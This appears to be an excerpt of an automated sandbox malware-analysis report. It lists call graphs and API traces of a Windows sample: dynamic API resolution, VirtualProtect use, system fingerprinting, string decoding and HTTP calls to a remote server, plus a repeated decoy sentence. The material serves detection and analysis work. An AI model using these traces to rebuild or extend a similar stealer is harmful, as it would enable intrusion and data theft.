14504 fe41f3 14503->14504 14505 fe45c0 2 API calls 14504->14505 14506 fe420c 14505->14506 14507 fe45c0 2 API calls 14506->14507 14508 fe4225 14507->14508 14509 fe45c0 2 API calls 14508->14509 14510 fe423e 14509->14510 14511 fe45c0 2 API calls 14510->14511 14512 fe4257 14511->14512 14513 fe45c0 2 API calls 14512->14513 14514 fe4270 14513->14514 14515 fe45c0 2 API calls 14514->14515 14516 fe4289 14515->14516 14517 fe45c0 2 API calls 14516->14517 14518 fe42a2 14517->14518 14519 fe45c0 2 API calls 14518->14519 14520 fe42bb 14519->14520 14521 fe45c0 2 API calls 14520->14521 14522 fe42d4 14521->14522 14523 fe45c0 2 API calls 14522->14523 14524 fe42ed 14523->14524 14525 fe45c0 2 API calls 14524->14525 14526 fe4306 14525->14526 14527 fe45c0 2 API calls 14526->14527 14528 fe431f 14527->14528 14529 fe45c0 2 API calls 14528->14529 14530 fe4338 14529->14530 14531 fe45c0 2 API calls 14530->14531 14532 fe4351 14531->14532 14533 fe45c0 2 API calls 14532->14533 14534 fe436a 14533->14534 14535 fe45c0 2 API calls 14534->14535 14536 fe4383 14535->14536 14537 fe45c0 2 API calls 14536->14537 14538 fe439c 14537->14538 14539 fe45c0 2 API calls 14538->14539 14540 fe43b5 14539->14540 14541 fe45c0 2 API calls 14540->14541 14542 fe43ce 14541->14542 14543 fe45c0 2 API calls 14542->14543 14544 fe43e7 14543->14544 14545 fe45c0 2 API calls 14544->14545 14546 fe4400 14545->14546 14547 fe45c0 2 API calls 14546->14547 14548 fe4419 14547->14548 14549 fe45c0 2 API calls 14548->14549 14550 fe4432 14549->14550 14551 fe45c0 2 API calls 14550->14551 14552 fe444b 14551->14552 14553 fe45c0 2 API calls 14552->14553 14554 fe4464 14553->14554 14555 fe45c0 2 API calls 14554->14555 14556 fe447d 14555->14556 14557 fe45c0 2 API calls 14556->14557 14558 fe4496 14557->14558 14559 fe45c0 2 API calls 14558->14559 14560 fe44af 14559->14560 14561 fe45c0 2 API calls 14560->14561 14562 fe44c8 14561->14562 14563 fe45c0 2 API calls 14562->14563 14564 fe44e1 14563->14564 14565 fe45c0 2 API calls 14564->14565 14566 fe44fa 
14565->14566 14567 fe45c0 2 API calls 14566->14567 14568 fe4513 14567->14568 14569 fe45c0 2 API calls 14568->14569 14570 fe452c 14569->14570 14571 fe45c0 2 API calls 14570->14571 14572 fe4545 14571->14572 14573 fe45c0 2 API calls 14572->14573 14574 fe455e 14573->14574 14575 fe45c0 2 API calls 14574->14575 14576 fe4577 14575->14576 14577 fe45c0 2 API calls 14576->14577 14578 fe4590 14577->14578 14579 fe45c0 2 API calls 14578->14579 14580 fe45a9 14579->14580 14581 ff9c10 14580->14581 14582 ffa036 8 API calls 14581->14582 14583 ff9c20 43 API calls 14581->14583 14584 ffa0cc GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 14582->14584 14585 ffa146 14582->14585 14583->14582 14584->14585 14586 ffa216 14585->14586 14587 ffa153 8 API calls 14585->14587 14588 ffa21f GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 14586->14588 14589 ffa298 14586->14589 14587->14586 14588->14589 14590 ffa337 14589->14590 14591 ffa2a5 6 API calls 14589->14591 14592 ffa41f 14590->14592 14593 ffa344 9 API calls 14590->14593 14591->14590 14594 ffa428 GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 14592->14594 14595 ffa4a2 14592->14595 14593->14592 14594->14595 14596 ffa4dc 14595->14596 14597 ffa4ab GetProcAddress GetProcAddress 14595->14597 14598 ffa515 14596->14598 14599 ffa4e5 GetProcAddress GetProcAddress 14596->14599 14597->14596 14600 ffa612 14598->14600 14601 ffa522 10 API calls 14598->14601 14599->14598 14602 ffa67d 14600->14602 14603 ffa61b GetProcAddress GetProcAddress GetProcAddress GetProcAddress 14600->14603 14601->14600 14604 ffa69e 14602->14604 14605 ffa686 GetProcAddress 14602->14605 14603->14602 14606 ff5ca3 14604->14606 14607 ffa6a7 GetProcAddress GetProcAddress GetProcAddress GetProcAddress 14604->14607 14605->14604 14608 fe1590 14606->14608 14607->14606 15730 fe1670 14608->15730 14611 ffa7a0 lstrcpy 14612 fe15b5 14611->14612 14613 ffa7a0 lstrcpy 14612->14613 14614 fe15c7 14613->14614 14615 ffa7a0 
lstrcpy 14614->14615 14616 fe15d9 14615->14616 14617 ffa7a0 lstrcpy 14616->14617 14618 fe1663 14617->14618 14619 ff5510 14618->14619 14620 ff5521 14619->14620 14621 ffa820 2 API calls 14620->14621 14622 ff552e 14621->14622 14623 ffa820 2 API calls 14622->14623 14624 ff553b 14623->14624 14625 ffa820 2 API calls 14624->14625 14626 ff5548 14625->14626 14627 ffa740 lstrcpy 14626->14627 14628 ff5555 14627->14628 14629 ffa740 lstrcpy 14628->14629 14630 ff5562 14629->14630 14631 ffa740 lstrcpy 14630->14631 14632 ff556f 14631->14632 14633 ffa740 lstrcpy 14632->14633 14651 ff557c 14633->14651 14634 ffa740 lstrcpy 14634->14651 14635 ffa820 lstrlen lstrcpy 14635->14651 14636 ff5643 StrCmpCA 14636->14651 14637 ff56a0 StrCmpCA 14638 ff57dc 14637->14638 14637->14651 14639 ffa8a0 lstrcpy 14638->14639 14640 ff57e8 14639->14640 14641 ffa820 2 API calls 14640->14641 14644 ff57f6 14641->14644 14642 ff5856 StrCmpCA 14646 ff5991 14642->14646 14642->14651 14643 ff51f0 20 API calls 14643->14651 14645 ffa820 2 API calls 14644->14645 14647 ff5805 14645->14647 14648 ffa8a0 lstrcpy 14646->14648 14649 fe1670 lstrcpy 14647->14649 14650 ff599d 14648->14650 14672 ff5811 14649->14672 14652 ffa820 2 API calls 14650->14652 14651->14634 14651->14635 14651->14636 14651->14637 14651->14642 14651->14643 14654 ff5a0b StrCmpCA 14651->14654 14655 ff52c0 25 API calls 14651->14655 14667 ff578a StrCmpCA 14651->14667 14669 ffa7a0 lstrcpy 14651->14669 14670 ff593f StrCmpCA 14651->14670 14671 ffa8a0 lstrcpy 14651->14671 14673 fe1590 lstrcpy 14651->14673 14653 ff59ab 14652->14653 14656 ffa820 2 API calls 14653->14656 14657 ff5a28 14654->14657 14658 ff5a16 Sleep 14654->14658 14655->14651 14659 ff59ba 14656->14659 14660 ffa8a0 lstrcpy 14657->14660 14658->14651 14661 fe1670 lstrcpy 14659->14661 14662 ff5a34 14660->14662 14661->14672 14663 ffa820 2 API calls 14662->14663 14664 ff5a43 14663->14664 14665 ffa820 2 API calls 14664->14665 14666 ff5a52 14665->14666 14668 fe1670 lstrcpy 14666->14668 14667->14651 
14668->14672 14669->14651 14670->14651 14671->14651 14672->13726 14673->14651 14675 ff754c 14674->14675 14676 ff7553 GetVolumeInformationA 14674->14676 14675->14676 14677 ff7591 14676->14677 14678 ff75fc GetProcessHeap RtlAllocateHeap 14677->14678 14679 ff7619 14678->14679 14680 ff7628 wsprintfA 14678->14680 14681 ffa740 lstrcpy 14679->14681 14682 ffa740 lstrcpy 14680->14682 14683 ff5da7 14681->14683 14682->14683 14683->13747 14685 ffa7a0 lstrcpy 14684->14685 14686 fe4899 14685->14686 15739 fe47b0 14686->15739 14688 fe48a5 14689 ffa740 lstrcpy 14688->14689 14690 fe48d7 14689->14690 14691 ffa740 lstrcpy 14690->14691 14692 fe48e4 14691->14692 14693 ffa740 lstrcpy 14692->14693 14694 fe48f1 14693->14694 14695 ffa740 lstrcpy 14694->14695 14696 fe48fe 14695->14696 14697 ffa740 lstrcpy 14696->14697 14698 fe490b InternetOpenA StrCmpCA 14697->14698 14699 fe4944 14698->14699 14700 fe4ecb InternetCloseHandle 14699->14700 14701 fe4955 14699->14701 14703 fe4ee8 14700->14703 15750 ff8b60 14701->15750 15745 fe9ac0 CryptStringToBinaryA 14703->15745 14704 fe4963 15758 ffa920 14704->15758 14707 fe4976 14709 ffa8a0 lstrcpy 14707->14709 14714 fe497f 14709->14714 14710 ffa820 2 API calls 14711 fe4f05 14710->14711 14712 ffa9b0 4 API calls 14711->14712 14715 fe4f1b 14712->14715 14713 fe4f27 codecvt 14717 ffa7a0 lstrcpy 14713->14717 14718 ffa9b0 4 API calls 14714->14718 14716 ffa8a0 lstrcpy 14715->14716 14716->14713 14730 fe4f57 14717->14730 14719 fe49a9 14718->14719 14720 ffa8a0 lstrcpy 14719->14720 14721 fe49b2 14720->14721 14722 ffa9b0 4 API calls 14721->14722 14723 fe49d1 14722->14723 14724 ffa8a0 lstrcpy 14723->14724 14725 fe49da 14724->14725 14726 ffa920 3 API calls 14725->14726 14727 fe49f8 14726->14727 14728 ffa8a0 lstrcpy 14727->14728 14729 fe4a01 14728->14729 14731 ffa9b0 4 API calls 14729->14731 14730->13750 14732 fe4a20 14731->14732 14733 ffa8a0 lstrcpy 14732->14733 14734 fe4a29 14733->14734 14735 ffa9b0 4 API calls 14734->14735 14736 fe4a48 14735->14736 14737 ffa8a0 lstrcpy 
14736->14737 14738 fe4a51 14737->14738 14739 ffa9b0 4 API calls 14738->14739 14740 fe4a7d 14739->14740 14741 ffa920 3 API calls 14740->14741 14742 fe4a84 14741->14742 14743 ffa8a0 lstrcpy 14742->14743 14744 fe4a8d 14743->14744 14745 fe4aa3 InternetConnectA 14744->14745 14745->14700 14746 fe4ad3 HttpOpenRequestA 14745->14746 14748 fe4ebe InternetCloseHandle 14746->14748 14749 fe4b28 14746->14749 14748->14700 14750 ffa9b0 4 API calls 14749->14750 14751 fe4b3c 14750->14751 14752 ffa8a0 lstrcpy 14751->14752 14753 fe4b45 14752->14753 14754 ffa920 3 API calls 14753->14754 14755 fe4b63 14754->14755 14756 ffa8a0 lstrcpy 14755->14756 14757 fe4b6c 14756->14757 14758 ffa9b0 4 API calls 14757->14758 14759 fe4b8b 14758->14759 14760 ffa8a0 lstrcpy 14759->14760 14761 fe4b94 14760->14761 14762 ffa9b0 4 API calls 14761->14762 14763 fe4bb5 14762->14763 14764 ffa8a0 lstrcpy 14763->14764 14765 fe4bbe 14764->14765 14766 ffa9b0 4 API calls 14765->14766 14767 fe4bde 14766->14767 14768 ffa8a0 lstrcpy 14767->14768 14769 fe4be7 14768->14769 14770 ffa9b0 4 API calls 14769->14770 14771 fe4c06 14770->14771 14772 ffa8a0 lstrcpy 14771->14772 14773 fe4c0f 14772->14773 14774 ffa920 3 API calls 14773->14774 14775 fe4c2d 14774->14775 14776 ffa8a0 lstrcpy 14775->14776 14777 fe4c36 14776->14777 14778 ffa9b0 4 API calls 14777->14778 14779 fe4c55 14778->14779 14780 ffa8a0 lstrcpy 14779->14780 14781 fe4c5e 14780->14781 14782 ffa9b0 4 API calls 14781->14782 14783 fe4c7d 14782->14783 14784 ffa8a0 lstrcpy 14783->14784 14785 fe4c86 14784->14785 14786 ffa920 3 API calls 14785->14786 14787 fe4ca4 14786->14787 14788 ffa8a0 lstrcpy 14787->14788 14789 fe4cad 14788->14789 14790 ffa9b0 4 API calls 14789->14790 14791 fe4ccc 14790->14791 14792 ffa8a0 lstrcpy 14791->14792 14793 fe4cd5 14792->14793 14794 ffa9b0 4 API calls 14793->14794 14795 fe4cf6 14794->14795 14796 ffa8a0 lstrcpy 14795->14796 14797 fe4cff 14796->14797 14798 ffa9b0 4 API calls 14797->14798 14799 fe4d1f 14798->14799 14800 ffa8a0 lstrcpy 14799->14800 

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 660 ff9860-ff9874 call ff9750 663 ff987a-ff9a8e call ff9780 GetProcAddress * 21 660->663 664 ff9a93-ff9af2 LoadLibraryA * 5 660->664 663->664 666 ff9b0d-ff9b14 664->666 667 ff9af4-ff9b08 GetProcAddress 664->667 669 ff9b46-ff9b4d 666->669 670 ff9b16-ff9b41 GetProcAddress * 2 666->670 667->666 671 ff9b4f-ff9b63 GetProcAddress 669->671 672 ff9b68-ff9b6f 669->672 670->669 671->672 673 ff9b89-ff9b90 672->673 674 ff9b71-ff9b84 GetProcAddress 672->674 675 ff9b92-ff9bbc GetProcAddress * 2 673->675 676 ff9bc1-ff9bc2 673->676 674->673 675->676
                                    APIs
                                    • GetProcAddress.KERNEL32(75900000,01800E78), ref: 00FF98A1
                                    • GetProcAddress.KERNEL32(75900000,01800D40), ref: 00FF98BA
                                    • GetProcAddress.KERNEL32(75900000,01800E90), ref: 00FF98D2
                                    • GetProcAddress.KERNEL32(75900000,01800ED8), ref: 00FF98EA
                                    • GetProcAddress.KERNEL32(75900000,01800CC8), ref: 00FF9903
                                    • GetProcAddress.KERNEL32(75900000,01808FC0), ref: 00FF991B
                                    • GetProcAddress.KERNEL32(75900000,017F4FA0), ref: 00FF9933
                                    • GetProcAddress.KERNEL32(75900000,017F4FE0), ref: 00FF994C
                                    • GetProcAddress.KERNEL32(75900000,01800F50), ref: 00FF9964
                                    • GetProcAddress.KERNEL32(75900000,01800C80), ref: 00FF997C
                                    • GetProcAddress.KERNEL32(75900000,01800D10), ref: 00FF9995
                                    • GetProcAddress.KERNEL32(75900000,01800D28), ref: 00FF99AD
                                    • GetProcAddress.KERNEL32(75900000,017F4F20), ref: 00FF99C5
                                    • GetProcAddress.KERNEL32(75900000,01800D58), ref: 00FF99DE
                                    • GetProcAddress.KERNEL32(75900000,01800D70), ref: 00FF99F6
                                    • GetProcAddress.KERNEL32(75900000,017F50E0), ref: 00FF9A0E
                                    • GetProcAddress.KERNEL32(75900000,01800D88), ref: 00FF9A27
                                    • GetProcAddress.KERNEL32(75900000,01800F98), ref: 00FF9A3F
                                    • GetProcAddress.KERNEL32(75900000,017F4E00), ref: 00FF9A57
                                    • GetProcAddress.KERNEL32(75900000,01800F80), ref: 00FF9A70
                                    • GetProcAddress.KERNEL32(75900000,017F5120), ref: 00FF9A88
                                    • LoadLibraryA.KERNEL32(01800FB0,?,00FF6A00), ref: 00FF9A9A
                                    • LoadLibraryA.KERNEL32(01800FC8,?,00FF6A00), ref: 00FF9AAB
                                    • LoadLibraryA.KERNEL32(01800FF8,?,00FF6A00), ref: 00FF9ABD
                                    • LoadLibraryA.KERNEL32(01800FE0,?,00FF6A00), ref: 00FF9ACF
                                    • LoadLibraryA.KERNEL32(01801010,?,00FF6A00), ref: 00FF9AE0
                                    • GetProcAddress.KERNEL32(75070000,01801028), ref: 00FF9B02
                                    • GetProcAddress.KERNEL32(75FD0000,01800F68), ref: 00FF9B23
                                    • GetProcAddress.KERNEL32(75FD0000,01809530), ref: 00FF9B3B
                                    • GetProcAddress.KERNEL32(75A50000,018095C0), ref: 00FF9B5D
                                    • GetProcAddress.KERNEL32(74E50000,017F5000), ref: 00FF9B7E
                                    • GetProcAddress.KERNEL32(76E80000,01809060), ref: 00FF9B9F
                                    • GetProcAddress.KERNEL32(76E80000,NtQueryInformationProcess), ref: 00FF9BB6
                                    Strings
                                    • NtQueryInformationProcess, xrefs: 00FF9BAA
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2080029586.0000000000FE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true
                                    • Associated: 00000000.00000002.2080015463.0000000000FE0000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2080029586.0000000001091000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2080029586.000000000109D000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2080029586.00000000010C2000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2080029586.000000000122A000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2080212290.000000000123E000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2080212290.00000000013CE000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2080212290.00000000014A1000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2080212290.00000000014C7000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2080212290.00000000014CE000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2080212290.00000000014DD000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2080930491.00000000014DE000.00000080.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2081146910.000000000167A000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2081208805.000000000167B000.00000080.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fe0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: AddressProc$LibraryLoad
                                    • String ID: NtQueryInformationProcess
                                    • API String ID: 2238633743-2781105232
                                    • Opcode ID: e721921819e76216ced36c1b1f4c853a71bb544a295e672bf52f327a0637938d
                                    • Instruction ID: 627401fe6b61da19a0cb136990138458c85e5c45bce7f7247e3042e9cf17a680
                                    • Opcode Fuzzy Hash: e721921819e76216ced36c1b1f4c853a71bb544a295e672bf52f327a0637938d
                                    • Instruction Fuzzy Hash: 69A148B5501200BFD378EFA8FA8CA6E37F9F78C201704652AE606C7E4CD6799841CB15

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 764 fe45c0-fe4695 RtlAllocateHeap 781 fe46a0-fe46a6 764->781 782 fe474f-fe47a9 VirtualProtect 781->782 783 fe46ac-fe474a 781->783 783->781
                                    APIs
                                    • RtlAllocateHeap.NTDLL(00000000), ref: 00FE460F
                                    • VirtualProtect.KERNEL32(?,00000004,00000100,00000000), ref: 00FE479C
                                    Strings
                                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00FE46C2
                                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00FE473F
                                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00FE45F3
                                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00FE471E
                                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00FE4765
                                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00FE4729
                                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00FE45E8
                                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00FE4662
                                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00FE45DD
                                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00FE45D2
                                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00FE4657
                                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00FE46AC
                                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00FE4638
                                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00FE4770
                                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00FE45C7
                                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00FE46B7
                                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00FE4643
                                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00FE4622
                                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00FE4683
                                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00FE474F
                                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00FE4713
                                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00FE475A
                                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00FE477B
                                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00FE46D8
                                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00FE4734
                                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00FE4617
                                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00FE466D
                                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00FE462D
                                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00FE4678
                                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00FE46CD
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2080029586.0000000000FE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true
                                    • Associated: 00000000.00000002.2080015463.0000000000FE0000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2080029586.0000000001091000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2080029586.000000000109D000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2080029586.00000000010C2000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2080029586.000000000122A000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2080212290.000000000123E000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2080212290.00000000013CE000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2080212290.00000000014A1000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2080212290.00000000014C7000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2080212290.00000000014CE000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2080212290.00000000014DD000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2080930491.00000000014DE000.00000080.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2081146910.000000000167A000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2081208805.000000000167B000.00000080.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fe0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: AllocateHeapProtectVirtual
                                    • String ID: The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.
                                    • API String ID: 1542196881-2218711628
                                    • Opcode ID: 522031eb575dc41a52fa366b046cb62ad6063f0a9c1364f2a5b34345f872bc18
                                    • Instruction ID: 512c7cf129ee48b586b9e5340f9cace5531848934c7129f0cf6536a5358a526c
                                    • Opcode Fuzzy Hash: 522031eb575dc41a52fa366b046cb62ad6063f0a9c1364f2a5b34345f872bc18
                                    • Instruction Fuzzy Hash: E14106607C33446AEE2DB7A79C6EEDDB756DF46600F60504EA9485B380EBB06900CB37

                                    Control-flow Graph

                                    APIs
                                      • Part of subcall function 00FFA7A0: lstrcpy.KERNEL32(?,00000000), ref: 00FFA7E6
                                      • Part of subcall function 00FE47B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00FE4839
                                      • Part of subcall function 00FE47B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00FE4849
                                      • Part of subcall function 00FFA740: lstrcpy.KERNEL32(01000E17,00000000), ref: 00FFA788
                                    • InternetOpenA.WININET(01000DFE,00000001,00000000,00000000,00000000), ref: 00FE62E1
                                    • StrCmpCA.SHLWAPI(?,0180EB30), ref: 00FE6303
                                    • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00FE6335
                                    • HttpOpenRequestA.WININET(00000000,GET,?,0180E5C0,00000000,00000000,00400100,00000000), ref: 00FE6385
                                    • InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 00FE63BF
                                    • HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00FE63D1
                                    • HttpQueryInfoA.WININET(00000000,00000013,?,00000100,00000000), ref: 00FE63FD
                                    • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 00FE646D
                                    • InternetCloseHandle.WININET(00000000), ref: 00FE64EF
                                    • InternetCloseHandle.WININET(00000000), ref: 00FE64F9
                                    • InternetCloseHandle.WININET(00000000), ref: 00FE6503
                                    Strings
                                    Memory Dump Source
